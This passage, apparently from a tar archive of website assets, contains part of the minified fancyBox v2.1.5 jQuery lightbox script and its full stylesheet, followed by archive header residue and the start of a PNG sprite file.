keys:{next:{13:"left",34:"up",39:"left",40:"up"},prev:{8:"right",33:"down",37:"right",38:"down"},close:[27],play:[32],toggle:[70]},direction:{next:"left",prev:"right"},scrollOutside:!0,index:0,type:null,href:null,content:null,title:null,tpl:{wrap:'<div class="fancybox-wrap" tabIndex="-1"><div class="fancybox-skin"><div class="fancybox-outer"><div class="fancybox-inner"></div></div></div></div>',image:'<img class="fancybox-image" src="{href}" alt="" />',iframe:'<iframe id="fancybox-frame{rnd}" name="fancybox-frame{rnd}" class="fancybox-iframe" frameborder="0" vspace="0" hspace="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen'+
(I?' allowtransparency="true"':"")+"></iframe>",error:'<p class="fancybox-error">The requested content cannot be loaded.<br/>Please try again later.</p>',closeBtn:'<a title="Close" class="fancybox-item fancybox-close" href="javascript:;"></a>',next:'<a title="Next" class="fancybox-nav fancybox-next" href="javascript:;"><span></span></a>',prev:'<a title="Previous" class="fancybox-nav fancybox-prev" href="javascript:;"><span></span></a>'},openEffect:"fade",openSpeed:250,openEasing:"swing",openOpacity:!0,
openMethod:"zoomIn",closeEffect:"fade",closeSpeed:250,closeEasing:"swing",closeOpacity:!0,closeMethod:"zoomOut",nextEffect:"elastic",nextSpeed:250,nextEasing:"swing",nextMethod:"changeIn",prevEffect:"elastic",prevSpeed:250,prevEasing:"swing",prevMethod:"changeOut",helpers:{overlay:!0,title:!0},onCancel:f.noop,beforeLoad:f.noop,afterLoad:f.noop,beforeShow:f.noop,afterShow:f.noop,beforeChange:f.noop,beforeClose:f.noop,afterClose:f.noop},group:{},opts:{},previous:null,coming:null,current:null,isActive:!1,
isOpen:!1,isOpened:!1,wrap:null,skin:null,outer:null,inner:null,player:{timer:null,isActive:!1},ajaxLoad:null,imgPreload:null,transitions:{},helpers:{},open:function(a,d){if(a&&(f.isPlainObject(d)||(d={}),!1!==b.close(!0)))return f.isArray(a)||(a=t(a)?f(a).get():[a]),f.each(a,function(e,c){var k={},g,h,j,m,l;"object"===f.type(c)&&(c.nodeType&&(c=f(c)),t(c)?(k={href:c.data("fancybox-href")||c.attr("href"),title:c.data("fancybox-title")||c.attr("title"),isDom:!0,element:c},f.metadata&&f.extend(!0,k,
c.metadata())):k=c);g=d.href||k.href||(q(c)?c:null);h=d.title!==v?d.title:k.title||"";m=(j=d.content||k.content)?"html":d.type||k.type;!m&&k.isDom&&(m=c.data("fancybox-type"),m||(m=(m=c.prop("class").match(/fancybox\.(\w+)/))?m[1]:null));q(g)&&(m||(b.isImage(g)?m="image":b.isSWF(g)?m="swf":"#"===g.charAt(0)?m="inline":q(c)&&(m="html",j=c)),"ajax"===m&&(l=g.split(/\s+/,2),g=l.shift(),l=l.shift()));j||("inline"===m?g?j=f(q(g)?g.replace(/.*(?=#[^\s]+$)/,""):g):k.isDom&&(j=c):"html"===m?j=g:!m&&(!g&&
k.isDom)&&(m="inline",j=c));f.extend(k,{href:g,type:m,content:j,title:h,selector:l});a[e]=k}),b.opts=f.extend(!0,{},b.defaults,d),d.keys!==v&&(b.opts.keys=d.keys?f.extend({},b.defaults.keys,d.keys):!1),b.group=a,b._start(b.opts.index)},cancel:function(){var a=b.coming;a&&!1!==b.trigger("onCancel")&&(b.hideLoading(),b.ajaxLoad&&b.ajaxLoad.abort(),b.ajaxLoad=null,b.imgPreload&&(b.imgPreload.onload=b.imgPreload.onerror=null),a.wrap&&a.wrap.stop(!0,!0).trigger("onReset").remove(),b.coming=null,b.current||
b._afterZoomOut(a))},close:function(a){b.cancel();!1!==b.trigger("beforeClose")&&(b.unbindEvents(),b.isActive&&(!b.isOpen||!0===a?(f(".fancybox-wrap").stop(!0).trigger("onReset").remove(),b._afterZoomOut()):(b.isOpen=b.isOpened=!1,b.isClosing=!0,f(".fancybox-item, .fancybox-nav").remove(),b.wrap.stop(!0,!0).removeClass("fancybox-opened"),b.transitions[b.current.closeMethod]())))},play:function(a){var d=function(){clearTimeout(b.player.timer)},e=function(){d();b.current&&b.player.isActive&&(b.player.timer=
setTimeout(b.next,b.current.playSpeed))},c=function(){d();p.unbind(".player");b.player.isActive=!1;b.trigger("onPlayEnd")};if(!0===a||!b.player.isActive&&!1!==a){if(b.current&&(b.current.loop||b.current.index<b.group.length-1))b.player.isActive=!0,p.bind({"onCancel.player beforeClose.player":c,"onUpdate.player":e,"beforeLoad.player":d}),e(),b.trigger("onPlayStart")}else c()},next:function(a){var d=b.current;d&&(q(a)||(a=d.direction.next),b.jumpto(d.index+1,a,"next"))},prev:function(a){var d=b.current;
d&&(q(a)||(a=d.direction.prev),b.jumpto(d.index-1,a,"prev"))},jumpto:function(a,d,e){var c=b.current;c&&(a=l(a),b.direction=d||c.direction[a>=c.index?"next":"prev"],b.router=e||"jumpto",c.loop&&(0>a&&(a=c.group.length+a%c.group.length),a%=c.group.length),c.group[a]!==v&&(b.cancel(),b._start(a)))},reposition:function(a,d){var e=b.current,c=e?e.wrap:null,k;c&&(k=b._getPosition(d),a&&"scroll"===a.type?(delete k.position,c.stop(!0,!0).animate(k,200)):(c.css(k),e.pos=f.extend({},e.dim,k)))},update:function(a){var d=
a&&a.type,e=!d||"orientationchange"===d;e&&(clearTimeout(B),B=null);b.isOpen&&!B&&(B=setTimeout(function(){var c=b.current;c&&!b.isClosing&&(b.wrap.removeClass("fancybox-tmp"),(e||"load"===d||"resize"===d&&c.autoResize)&&b._setDimension(),"scroll"===d&&c.canShrink||b.reposition(a),b.trigger("onUpdate"),B=null)},e&&!s?0:300))},toggle:function(a){b.isOpen&&(b.current.fitToView="boolean"===f.type(a)?a:!b.current.fitToView,s&&(b.wrap.removeAttr("style").addClass("fancybox-tmp"),b.trigger("onUpdate")),
b.update())},hideLoading:function(){p.unbind(".loading");f("#fancybox-loading").remove()},showLoading:function(){var a,d;b.hideLoading();a=f('<div id="fancybox-loading"><div></div></div>').click(b.cancel).appendTo("body");p.bind("keydown.loading",function(a){if(27===(a.which||a.keyCode))a.preventDefault(),b.cancel()});b.defaults.fixed||(d=b.getViewport(),a.css({position:"absolute",top:0.5*d.h+d.y,left:0.5*d.w+d.x}))},getViewport:function(){var a=b.current&&b.current.locked||!1,d={x:n.scrollLeft(),
y:n.scrollTop()};a?(d.w=a[0].clientWidth,d.h=a[0].clientHeight):(d.w=s&&r.innerWidth?r.innerWidth:n.width(),d.h=s&&r.innerHeight?r.innerHeight:n.height());return d},unbindEvents:function(){b.wrap&&t(b.wrap)&&b.wrap.unbind(".fb");p.unbind(".fb");n.unbind(".fb")},bindEvents:function(){var a=b.current,d;a&&(n.bind("orientationchange.fb"+(s?"":" resize.fb")+(a.autoCenter&&!a.locked?" scroll.fb":""),b.update),(d=a.keys)&&p.bind("keydown.fb",function(e){var c=e.which||e.keyCode,k=e.target||e.srcElement;
if(27===c&&b.coming)return!1;!e.ctrlKey&&(!e.altKey&&!e.shiftKey&&!e.metaKey&&(!k||!k.type&&!f(k).is("[contenteditable]")))&&f.each(d,function(d,k){if(1<a.group.length&&k[c]!==v)return b[d](k[c]),e.preventDefault(),!1;if(-1<f.inArray(c,k))return b[d](),e.preventDefault(),!1})}),f.fn.mousewheel&&a.mouseWheel&&b.wrap.bind("mousewheel.fb",function(d,c,k,g){for(var h=f(d.target||null),j=!1;h.length&&!j&&!h.is(".fancybox-skin")&&!h.is(".fancybox-wrap");)j=h[0]&&!(h[0].style.overflow&&"hidden"===h[0].style.overflow)&&
(h[0].clientWidth&&h[0].scrollWidth>h[0].clientWidth||h[0].clientHeight&&h[0].scrollHeight>h[0].clientHeight),h=f(h).parent();if(0!==c&&!j&&1<b.group.length&&!a.canShrink){if(0<g||0<k)b.prev(0<g?"down":"left");else if(0>g||0>k)b.next(0>g?"up":"right");d.preventDefault()}}))},trigger:function(a,d){var e,c=d||b.coming||b.current;if(c){f.isFunction(c[a])&&(e=c[a].apply(c,Array.prototype.slice.call(arguments,1)));if(!1===e)return!1;c.helpers&&f.each(c.helpers,function(d,e){if(e&&b.helpers[d]&&f.isFunction(b.helpers[d][a]))b.helpers[d][a](f.extend(!0,
{},b.helpers[d].defaults,e),c)});p.trigger(a)}},isImage:function(a){return q(a)&&a.match(/(^data:image\/.*,)|(\.(jp(e|g|eg)|gif|png|bmp|webp|svg)((\?|#).*)?$)/i)},isSWF:function(a){return q(a)&&a.match(/\.(swf)((\?|#).*)?$/i)},_start:function(a){var d={},e,c;a=l(a);e=b.group[a]||null;if(!e)return!1;d=f.extend(!0,{},b.opts,e);e=d.margin;c=d.padding;"number"===f.type(e)&&(d.margin=[e,e,e,e]);"number"===f.type(c)&&(d.padding=[c,c,c,c]);d.modal&&f.extend(!0,d,{closeBtn:!1,closeClick:!1,nextClick:!1,arrows:!1,
mouseWheel:!1,keys:null,helpers:{overlay:{closeClick:!1}}});d.autoSize&&(d.autoWidth=d.autoHeight=!0);"auto"===d.width&&(d.autoWidth=!0);"auto"===d.height&&(d.autoHeight=!0);d.group=b.group;d.index=a;b.coming=d;if(!1===b.trigger("beforeLoad"))b.coming=null;else{c=d.type;e=d.href;if(!c)return b.coming=null,b.current&&b.router&&"jumpto"!==b.router?(b.current.index=a,b[b.router](b.direction)):!1;b.isActive=!0;if("image"===c||"swf"===c)d.autoHeight=d.autoWidth=!1,d.scrolling="visible";"image"===c&&(d.aspectRatio=
!0);"iframe"===c&&s&&(d.scrolling="scroll");d.wrap=f(d.tpl.wrap).addClass("fancybox-"+(s?"mobile":"desktop")+" fancybox-type-"+c+" fancybox-tmp "+d.wrapCSS).appendTo(d.parent||"body");f.extend(d,{skin:f(".fancybox-skin",d.wrap),outer:f(".fancybox-outer",d.wrap),inner:f(".fancybox-inner",d.wrap)});f.each(["Top","Right","Bottom","Left"],function(a,b){d.skin.css("padding"+b,w(d.padding[a]))});b.trigger("onReady");if("inline"===c||"html"===c){if(!d.content||!d.content.length)return b._error("content")}else if(!e)return b._error("href");
"image"===c?b._loadImage():"ajax"===c?b._loadAjax():"iframe"===c?b._loadIframe():b._afterLoad()}},_error:function(a){f.extend(b.coming,{type:"html",autoWidth:!0,autoHeight:!0,minWidth:0,minHeight:0,scrolling:"no",hasError:a,content:b.coming.tpl.error});b._afterLoad()},_loadImage:function(){var a=b.imgPreload=new Image;a.onload=function(){this.onload=this.onerror=null;b.coming.width=this.width/b.opts.pixelRatio;b.coming.height=this.height/b.opts.pixelRatio;b._afterLoad()};a.onerror=function(){this.onload=
this.onerror=null;b._error("image")};a.src=b.coming.href;!0!==a.complete&&b.showLoading()},_loadAjax:function(){var a=b.coming;b.showLoading();b.ajaxLoad=f.ajax(f.extend({},a.ajax,{url:a.href,error:function(a,e){b.coming&&"abort"!==e?b._error("ajax",a):b.hideLoading()},success:function(d,e){"success"===e&&(a.content=d,b._afterLoad())}}))},_loadIframe:function(){var a=b.coming,d=f(a.tpl.iframe.replace(/\{rnd\}/g,(new Date).getTime())).attr("scrolling",s?"auto":a.iframe.scrolling).attr("src",a.href);
f(a.wrap).bind("onReset",function(){try{f(this).find("iframe").hide().attr("src","//about:blank").end().empty()}catch(a){}});a.iframe.preload&&(b.showLoading(),d.one("load",function(){f(this).data("ready",1);s||f(this).bind("load.fb",b.update);f(this).parents(".fancybox-wrap").width("100%").removeClass("fancybox-tmp").show();b._afterLoad()}));a.content=d.appendTo(a.inner);a.iframe.preload||b._afterLoad()},_preloadImages:function(){var a=b.group,d=b.current,e=a.length,c=d.preload?Math.min(d.preload,
e-1):0,f,g;for(g=1;g<=c;g+=1)f=a[(d.index+g)%e],"image"===f.type&&f.href&&((new Image).src=f.href)},_afterLoad:function(){var a=b.coming,d=b.current,e,c,k,g,h;b.hideLoading();if(a&&!1!==b.isActive)if(!1===b.trigger("afterLoad",a,d))a.wrap.stop(!0).trigger("onReset").remove(),b.coming=null;else{d&&(b.trigger("beforeChange",d),d.wrap.stop(!0).removeClass("fancybox-opened").find(".fancybox-item, .fancybox-nav").remove());b.unbindEvents();e=a.content;c=a.type;k=a.scrolling;f.extend(b,{wrap:a.wrap,skin:a.skin,
outer:a.outer,inner:a.inner,current:a,previous:d});g=a.href;switch(c){case "inline":case "ajax":case "html":a.selector?e=f("<div>").html(e).find(a.selector):t(e)&&(e.data("fancybox-placeholder")||e.data("fancybox-placeholder",f('<div class="fancybox-placeholder"></div>').insertAfter(e).hide()),e=e.show().detach(),a.wrap.bind("onReset",function(){f(this).find(e).length&&e.hide().replaceAll(e.data("fancybox-placeholder")).data("fancybox-placeholder",!1)}));break;case "image":e=a.tpl.image.replace("{href}",
g);break;case "swf":e='<object id="fancybox-swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%"><param name="movie" value="'+g+'"></param>',h="",f.each(a.swf,function(a,b){e+='<param name="'+a+'" value="'+b+'"></param>';h+=" "+a+'="'+b+'"'}),e+='<embed src="'+g+'" type="application/x-shockwave-flash" width="100%" height="100%"'+h+"></embed></object>"}(!t(e)||!e.parent().is(a.inner))&&a.inner.append(e);b.trigger("beforeShow");a.inner.css("overflow","yes"===k?"scroll":
"no"===k?"hidden":k);b._setDimension();b.reposition();b.isOpen=!1;b.coming=null;b.bindEvents();if(b.isOpened){if(d.prevMethod)b.transitions[d.prevMethod]()}else f(".fancybox-wrap").not(a.wrap).stop(!0).trigger("onReset").remove();b.transitions[b.isOpened?a.nextMethod:a.openMethod]();b._preloadImages()}},_setDimension:function(){var a=b.getViewport(),d=0,e=!1,c=!1,e=b.wrap,k=b.skin,g=b.inner,h=b.current,c=h.width,j=h.height,m=h.minWidth,u=h.minHeight,n=h.maxWidth,p=h.maxHeight,s=h.scrolling,q=h.scrollOutside?
h.scrollbarWidth:0,x=h.margin,y=l(x[1]+x[3]),r=l(x[0]+x[2]),v,z,t,C,A,F,B,D,H;e.add(k).add(g).width("auto").height("auto").removeClass("fancybox-tmp");x=l(k.outerWidth(!0)-k.width());v=l(k.outerHeight(!0)-k.height());z=y+x;t=r+v;C=E(c)?(a.w-z)*l(c)/100:c;A=E(j)?(a.h-t)*l(j)/100:j;if("iframe"===h.type){if(H=h.content,h.autoHeight&&1===H.data("ready"))try{H[0].contentWindow.document.location&&(g.width(C).height(9999),F=H.contents().find("body"),q&&F.css("overflow-x","hidden"),A=F.outerHeight(!0))}catch(G){}}else if(h.autoWidth||
h.autoHeight)g.addClass("fancybox-tmp"),h.autoWidth||g.width(C),h.autoHeight||g.height(A),h.autoWidth&&(C=g.width()),h.autoHeight&&(A=g.height()),g.removeClass("fancybox-tmp");c=l(C);j=l(A);D=C/A;m=l(E(m)?l(m,"w")-z:m);n=l(E(n)?l(n,"w")-z:n);u=l(E(u)?l(u,"h")-t:u);p=l(E(p)?l(p,"h")-t:p);F=n;B=p;h.fitToView&&(n=Math.min(a.w-z,n),p=Math.min(a.h-t,p));z=a.w-y;r=a.h-r;h.aspectRatio?(c>n&&(c=n,j=l(c/D)),j>p&&(j=p,c=l(j*D)),c<m&&(c=m,j=l(c/D)),j<u&&(j=u,c=l(j*D))):(c=Math.max(m,Math.min(c,n)),h.autoHeight&&
"iframe"!==h.type&&(g.width(c),j=g.height()),j=Math.max(u,Math.min(j,p)));if(h.fitToView)if(g.width(c).height(j),e.width(c+x),a=e.width(),y=e.height(),h.aspectRatio)for(;(a>z||y>r)&&(c>m&&j>u)&&!(19<d++);)j=Math.max(u,Math.min(p,j-10)),c=l(j*D),c<m&&(c=m,j=l(c/D)),c>n&&(c=n,j=l(c/D)),g.width(c).height(j),e.width(c+x),a=e.width(),y=e.height();else c=Math.max(m,Math.min(c,c-(a-z))),j=Math.max(u,Math.min(j,j-(y-r)));q&&("auto"===s&&j<A&&c+x+q<z)&&(c+=q);g.width(c).height(j);e.width(c+x);a=e.width();
y=e.height();e=(a>z||y>r)&&c>m&&j>u;c=h.aspectRatio?c<F&&j<B&&c<C&&j<A:(c<F||j<B)&&(c<C||j<A);f.extend(h,{dim:{width:w(a),height:w(y)},origWidth:C,origHeight:A,canShrink:e,canExpand:c,wPadding:x,hPadding:v,wrapSpace:y-k.outerHeight(!0),skinSpace:k.height()-j});!H&&(h.autoHeight&&j>u&&j<p&&!c)&&g.height("auto")},_getPosition:function(a){var d=b.current,e=b.getViewport(),c=d.margin,f=b.wrap.width()+c[1]+c[3],g=b.wrap.height()+c[0]+c[2],c={position:"absolute",top:c[0],left:c[3]};d.autoCenter&&d.fixed&&
!a&&g<=e.h&&f<=e.w?c.position="fixed":d.locked||(c.top+=e.y,c.left+=e.x);c.top=w(Math.max(c.top,c.top+(e.h-g)*d.topRatio));c.left=w(Math.max(c.left,c.left+(e.w-f)*d.leftRatio));return c},_afterZoomIn:function(){var a=b.current;a&&(b.isOpen=b.isOpened=!0,b.wrap.css("overflow","visible").addClass("fancybox-opened"),b.update(),(a.closeClick||a.nextClick&&1<b.group.length)&&b.inner.css("cursor","pointer").bind("click.fb",function(d){!f(d.target).is("a")&&!f(d.target).parent().is("a")&&(d.preventDefault(),
b[a.closeClick?"close":"next"]())}),a.closeBtn&&f(a.tpl.closeBtn).appendTo(b.skin).bind("click.fb",function(a){a.preventDefault();b.close()}),a.arrows&&1<b.group.length&&((a.loop||0<a.index)&&f(a.tpl.prev).appendTo(b.outer).bind("click.fb",b.prev),(a.loop||a.index<b.group.length-1)&&f(a.tpl.next).appendTo(b.outer).bind("click.fb",b.next)),b.trigger("afterShow"),!a.loop&&a.index===a.group.length-1?b.play(!1):b.opts.autoPlay&&!b.player.isActive&&(b.opts.autoPlay=!1,b.play()))},_afterZoomOut:function(a){a=
a||b.current;f(".fancybox-wrap").trigger("onReset").remove();f.extend(b,{group:{},opts:{},router:!1,current:null,isActive:!1,isOpened:!1,isOpen:!1,isClosing:!1,wrap:null,skin:null,outer:null,inner:null});b.trigger("afterClose",a)}});b.transitions={getOrigPosition:function(){var a=b.current,d=a.element,e=a.orig,c={},f=50,g=50,h=a.hPadding,j=a.wPadding,m=b.getViewport();!e&&(a.isDom&&d.is(":visible"))&&(e=d.find("img:first"),e.length||(e=d));t(e)?(c=e.offset(),e.is("img")&&(f=e.outerWidth(),g=e.outerHeight())):
(c.top=m.y+(m.h-g)*a.topRatio,c.left=m.x+(m.w-f)*a.leftRatio);if("fixed"===b.wrap.css("position")||a.locked)c.top-=m.y,c.left-=m.x;return c={top:w(c.top-h*a.topRatio),left:w(c.left-j*a.leftRatio),width:w(f+j),height:w(g+h)}},step:function(a,d){var e,c,f=d.prop;c=b.current;var g=c.wrapSpace,h=c.skinSpace;if("width"===f||"height"===f)e=d.end===d.start?1:(a-d.start)/(d.end-d.start),b.isClosing&&(e=1-e),c="width"===f?c.wPadding:c.hPadding,c=a-c,b.skin[f](l("width"===f?c:c-g*e)),b.inner[f](l("width"===
f?c:c-g*e-h*e))},zoomIn:function(){var a=b.current,d=a.pos,e=a.openEffect,c="elastic"===e,k=f.extend({opacity:1},d);delete k.position;c?(d=this.getOrigPosition(),a.openOpacity&&(d.opacity=0.1)):"fade"===e&&(d.opacity=0.1);b.wrap.css(d).animate(k,{duration:"none"===e?0:a.openSpeed,easing:a.openEasing,step:c?this.step:null,complete:b._afterZoomIn})},zoomOut:function(){var a=b.current,d=a.closeEffect,e="elastic"===d,c={opacity:0.1};e&&(c=this.getOrigPosition(),a.closeOpacity&&(c.opacity=0.1));b.wrap.animate(c,
{duration:"none"===d?0:a.closeSpeed,easing:a.closeEasing,step:e?this.step:null,complete:b._afterZoomOut})},changeIn:function(){var a=b.current,d=a.nextEffect,e=a.pos,c={opacity:1},f=b.direction,g;e.opacity=0.1;"elastic"===d&&(g="down"===f||"up"===f?"top":"left","down"===f||"right"===f?(e[g]=w(l(e[g])-200),c[g]="+=200px"):(e[g]=w(l(e[g])+200),c[g]="-=200px"));"none"===d?b._afterZoomIn():b.wrap.css(e).animate(c,{duration:a.nextSpeed,easing:a.nextEasing,complete:b._afterZoomIn})},changeOut:function(){var a=
b.previous,d=a.prevEffect,e={opacity:0.1},c=b.direction;"elastic"===d&&(e["down"===c||"up"===c?"top":"left"]=("up"===c||"left"===c?"-":"+")+"=200px");a.wrap.animate(e,{duration:"none"===d?0:a.prevSpeed,easing:a.prevEasing,complete:function(){f(this).trigger("onReset").remove()}})}};b.helpers.overlay={defaults:{closeClick:!0,speedOut:200,showEarly:!0,css:{},locked:!s,fixed:!0},overlay:null,fixed:!1,el:f("html"),create:function(a){a=f.extend({},this.defaults,a);this.overlay&&this.close();this.overlay=
f('<div class="fancybox-overlay"></div>').appendTo(b.coming?b.coming.parent:a.parent);this.fixed=!1;a.fixed&&b.defaults.fixed&&(this.overlay.addClass("fancybox-overlay-fixed"),this.fixed=!0)},open:function(a){var d=this;a=f.extend({},this.defaults,a);this.overlay?this.overlay.unbind(".overlay").width("auto").height("auto"):this.create(a);this.fixed||(n.bind("resize.overlay",f.proxy(this.update,this)),this.update());a.closeClick&&this.overlay.bind("click.overlay",function(a){if(f(a.target).hasClass("fancybox-overlay"))return b.isActive?
b.close():d.close(),!1});this.overlay.css(a.css).show()},close:function(){var a,b;n.unbind("resize.overlay");this.el.hasClass("fancybox-lock")&&(f(".fancybox-margin").removeClass("fancybox-margin"),a=n.scrollTop(),b=n.scrollLeft(),this.el.removeClass("fancybox-lock"),n.scrollTop(a).scrollLeft(b));f(".fancybox-overlay").remove().hide();f.extend(this,{overlay:null,fixed:!1})},update:function(){var a="100%",b;this.overlay.width(a).height("100%");I?(b=Math.max(G.documentElement.offsetWidth,G.body.offsetWidth),
p.width()>b&&(a=p.width())):p.width()>n.width()&&(a=p.width());this.overlay.width(a).height(p.height())},onReady:function(a,b){var e=this.overlay;f(".fancybox-overlay").stop(!0,!0);e||this.create(a);a.locked&&(this.fixed&&b.fixed)&&(e||(this.margin=p.height()>n.height()?f("html").css("margin-right").replace("px",""):!1),b.locked=this.overlay.append(b.wrap),b.fixed=!1);!0===a.showEarly&&this.beforeShow.apply(this,arguments)},beforeShow:function(a,b){var e,c;b.locked&&(!1!==this.margin&&(f("*").filter(function(){return"fixed"===
f(this).css("position")&&!f(this).hasClass("fancybox-overlay")&&!f(this).hasClass("fancybox-wrap")}).addClass("fancybox-margin"),this.el.addClass("fancybox-margin")),e=n.scrollTop(),c=n.scrollLeft(),this.el.addClass("fancybox-lock"),n.scrollTop(e).scrollLeft(c));this.open(a)},onUpdate:function(){this.fixed||this.update()},afterClose:function(a){this.overlay&&!b.coming&&this.overlay.fadeOut(a.speedOut,f.proxy(this.close,this))}};b.helpers.title={defaults:{type:"float",position:"bottom"},beforeShow:function(a){var d=
b.current,e=d.title,c=a.type;f.isFunction(e)&&(e=e.call(d.element,d));if(q(e)&&""!==f.trim(e)){d=f('<div class="fancybox-title fancybox-title-'+c+'-wrap">'+e+"</div>");switch(c){case "inside":c=b.skin;break;case "outside":c=b.wrap;break;case "over":c=b.inner;break;default:c=b.skin,d.appendTo("body"),I&&d.width(d.width()),d.wrapInner('<span class="child"></span>'),b.current.margin[2]+=Math.abs(l(d.css("margin-bottom")))}d["top"===a.position?"prependTo":"appendTo"](c)}}};f.fn.fancybox=function(a){var d,
e=f(this),c=this.selector||"",k=function(g){var h=f(this).blur(),j=d,k,l;!g.ctrlKey&&(!g.altKey&&!g.shiftKey&&!g.metaKey)&&!h.is(".fancybox-wrap")&&(k=a.groupAttr||"data-fancybox-group",l=h.attr(k),l||(k="rel",l=h.get(0)[k]),l&&(""!==l&&"nofollow"!==l)&&(h=c.length?f(c):e,h=h.filter("["+k+'="'+l+'"]'),j=h.index(this)),a.index=j,!1!==b.open(h,a)&&g.preventDefault())};a=a||{};d=a.index||0;!c||!1===a.live?e.unbind("click.fb-start").bind("click.fb-start",k):p.undelegate(c,"click.fb-start").delegate(c+
":not('.fancybox-item, .fancybox-nav')","click.fb-start",k);this.filter("[data-fancybox-start=1]").trigger("click");return this};p.ready(function(){var a,d;f.scrollbarWidth===v&&(f.scrollbarWidth=function(){var a=f('<div style="width:50px;height:50px;overflow:auto"><div/></div>').appendTo("body"),b=a.children(),b=b.innerWidth()-b.height(99).innerWidth();a.remove();return b});if(f.support.fixedPosition===v){a=f.support;d=f('<div style="position:fixed;top:20px;"></div>').appendTo("body");var e=20===
d[0].offsetTop||15===d[0].offsetTop;d.remove();a.fixedPosition=e}f.extend(b.defaults,{scrollbarWidth:f.scrollbarWidth(),fixed:f.support.fixedPosition,parent:f("body")});a=f(r).width();J.addClass("fancybox-lock-test");d=f(r).width();J.removeClass("fancybox-lock-test");f("<style type='text/css'>.fancybox-margin{margin-right:"+(d-a)+"px;}</style>").appendTo("head")})})(window,document,jQuery);js/fancybox/jquery.fancybox.css000060400000011437152434416630012644 0ustar00/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */
.fancybox-wrap,
.fancybox-skin,
.fancybox-outer,
.fancybox-inner,
.fancybox-image,
.fancybox-wrap iframe,
.fancybox-wrap object,
.fancybox-nav,
.fancybox-nav span,
.fancybox-tmp
{
	padding: 0;
	margin: 0;
	border: 0;
	outline: none;
	vertical-align: top;
}

.fancybox-wrap {
	position: absolute;
	top: 0;
	left: 0;
	z-index: 8020;
}

.fancybox-skin {
	position: relative;
	background: #f9f9f9;
	color: #444;
	text-shadow: none;
	-webkit-border-radius: 4px;
	   -moz-border-radius: 4px;
	        border-radius: 4px;
}

.fancybox-opened {
	z-index: 8030;
}

.fancybox-opened .fancybox-skin {
	-webkit-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
	   -moz-box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
	        box-shadow: 0 10px 25px rgba(0, 0, 0, 0.5);
}

.fancybox-outer, .fancybox-inner {
	position: relative;
}

.fancybox-inner {
	overflow: hidden;
}

.fancybox-type-iframe .fancybox-inner {
	-webkit-overflow-scrolling: touch;
}

.fancybox-error {
	color: #444;
	font: 14px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
	margin: 0;
	padding: 15px;
	white-space: nowrap;
}

.fancybox-image, .fancybox-iframe {
	display: block;
	width: 100%;
	height: 100%;
}

.fancybox-image {
	max-width: 100%;
	max-height: 100%;
}

#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
	background-image: url('fancybox_sprite.png');
}

#fancybox-loading {
	position: fixed;
	top: 50%;
	left: 50%;
	margin-top: -22px;
	margin-left: -22px;
	background-position: 0 -108px;
	opacity: 0.8;
	cursor: pointer;
	z-index: 8060;
}

#fancybox-loading div {
	width: 44px;
	height: 44px;
	background: url('fancybox_loading.gif') center center no-repeat;
}

.fancybox-close {
	position: absolute;
	top: -18px;
	right: -18px;
	width: 36px;
	height: 36px;
	cursor: pointer;
	z-index: 8040;
}

.fancybox-nav {
	position: absolute;
	top: 0;
	width: 40%;
	height: 100%;
	cursor: pointer;
	text-decoration: none;
	background: transparent url('blank.gif'); /* helps IE */
	-webkit-tap-highlight-color: rgba(0,0,0,0);
	z-index: 8040;
}

.fancybox-prev {
	left: 0;
}

.fancybox-next {
	right: 0;
}

.fancybox-nav span {
	position: absolute;
	top: 50%;
	width: 36px;
	height: 34px;
	margin-top: -18px;
	cursor: pointer;
	z-index: 8040;
	visibility: hidden;
}

.fancybox-prev span {
	left: 10px;
	background-position: 0 -36px;
}

.fancybox-next span {
	right: 10px;
	background-position: 0 -72px;
}

.fancybox-nav:hover span {
	visibility: visible;
}

.fancybox-tmp {
	position: absolute;
	top: -99999px;
	left: -99999px;
	visibility: hidden;
	max-width: 99999px;
	max-height: 99999px;
	overflow: visible !important;
}

/* Overlay helper */

.fancybox-lock {
    overflow: hidden !important;
    width: auto;
}

.fancybox-lock body {
    overflow: hidden !important;
}

.fancybox-lock-test {
    overflow-y: hidden !important;
}

.fancybox-overlay {
	position: absolute;
	top: 0;
	left: 0;
	overflow: hidden;
	display: none;
	z-index: 8010;
	background: url('fancybox_overlay.png');
}

.fancybox-overlay-fixed {
	position: fixed;
	bottom: 0;
	right: 0;
}

.fancybox-lock .fancybox-overlay {
	overflow: auto;
	overflow-y: scroll;
}

/* Title helper */

.fancybox-title {
	visibility: hidden;
	font: normal 13px/20px "Helvetica Neue",Helvetica,Arial,sans-serif;
	position: relative;
	text-shadow: none;
	z-index: 8050;
}

.fancybox-opened .fancybox-title {
	visibility: visible;
}

.fancybox-title-float-wrap {
	position: absolute;
	bottom: 0;
	right: 50%;
	margin-bottom: -35px;
	z-index: 8050;
	text-align: center;
}

.fancybox-title-float-wrap .child {
	display: inline-block;
	margin-right: -100%;
	padding: 2px 20px;
	background: transparent; /* Fallback for web browsers that doesn't support RGBa */
	background: rgba(0, 0, 0, 0.8);
	-webkit-border-radius: 15px;
	   -moz-border-radius: 15px;
	        border-radius: 15px;
	text-shadow: 0 1px 2px #222;
	color: #FFF;
	font-weight: bold;
	line-height: 24px;
	white-space: nowrap;
}

.fancybox-title-outside-wrap {
	position: relative;
	margin-top: 10px;
	color: #fff;
}

.fancybox-title-inside-wrap {
	padding-top: 10px;
}

.fancybox-title-over-wrap {
	position: absolute;
	bottom: 0;
	left: 0;
	color: #fff;
	padding: 10px;
	background: #000;
	background: rgba(0, 0, 0, .8);
}

/*Retina graphics!*/
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),
	   only screen and (min--moz-device-pixel-ratio: 1.5),
	   only screen and (min-device-pixel-ratio: 1.5){

	#fancybox-loading, .fancybox-close, .fancybox-prev span, .fancybox-next span {
		background-image: url('fancybox_sprite@2x.png');
		background-size: 44px 152px; /*The size of the normal image, half the size of the hi-res image*/
	}

	#fancybox-loading div {
		background-image: url('fancybox_loading@2x.gif');
		background-size: 24px 24px; /*The size of the normal image, half the size of the hi-res image*/
	}
}js/fancybox/fancybox_sprite.png000060400000002522152434416630012703 0ustar00�PNG


